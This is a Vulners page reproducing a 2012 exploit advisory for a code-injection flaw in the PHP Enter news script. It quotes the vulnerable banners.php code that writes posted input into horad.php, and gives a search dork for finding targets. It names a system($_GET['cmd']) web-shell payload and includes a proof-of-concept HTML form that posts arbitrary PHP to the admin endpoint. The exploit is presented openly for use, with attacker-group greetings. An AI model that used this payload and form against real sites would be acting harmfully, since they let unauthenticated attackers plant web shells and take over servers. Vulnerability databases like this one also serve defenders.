Vulners
Lucene search
PHP Enter Code Injection
`########################################################
#
# Exploit Title : Php Enter Php Code Injection
#
# Author : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://www.phpenter.net/
#
# Security Risk : High
#
# Version : beta
#
# Tested on : win\XP
#
# Dork : allintext: "Powered by phpEnter.net"
#
# 1) Info Script
# 2) Info Vulnerability
# 3) P0c
#
########################################################
#
# 1) Info Script:
#
# PHP Enter is a free and Open Source PHP News Publishing script.
# It is an online news publishing system that features easy installation,
user submission.
# and an admin panel for adding, editing and removing categories and news.
########################################################
#
# 2) Info Vulnerability :
#
# This exploit allow attacker to inject php code execution like
system($_GET['cmd']);
# In file named banners in admin folder :
#
# 1. <?php
# 2. if(isset($_POST['submit']))
# 3. {
# 4. $ccode = $_POST['code'];
# 5.
# 6. $myFile="horad.php";
# 7. $fh = fopen($myFile, 'w') or die("can't open file- check CHMOD");
# 8. $stringData = "$ccode";
# 9. fwrite($fh, $stringData);
# 10. fclose($fh);
# 11. echo"<br /><center><font size=2
color=green>Successfully.</font></center>";
# 12. }else{
# 13. ?>
#
# Look to line 7 fopen MYFILE , $myfile="horad.php" or die can't open file
check chmod.
# fwrite FH variable and stringdata, So String Data doesn't secure :), can
attacker to inject php code execution.
# Look to line 4 : $_POST['code'];, attacker will inject in POST from any
tool dev, like HTTP LIVE EDITOR, HTTP Live headers.
#
#
#########################################################
#
# 3) p0c :
#
# <form method="post" action="http://localhost/admin/banners.php">
# <center>
# <font color=#3A586A>Code</font><br />
# <textarea name="code"></textarea>
# <br /><br />
# <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br
/>
# </form>
#
#########################################################
#
# Special Thx to : Irist.ir Team & Sec4ever.com Team
#
#########################################################
#
# Greet'z : Am1r, The Injector, Sec4ever, b0x, Paulzz, Virus-Ra3ech,
Damane2011
# Hacker-1420, Th3 Killer Dz, OVER-X <3, Stalk3r, The Viper, N4ss1m, B07
M4S73R
# Ked-Ans, And All Members Of Irist And Sec4ever Team
#
#########################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 May 2012 00:00Current
0.3Low risk
Vulners AI Score0.3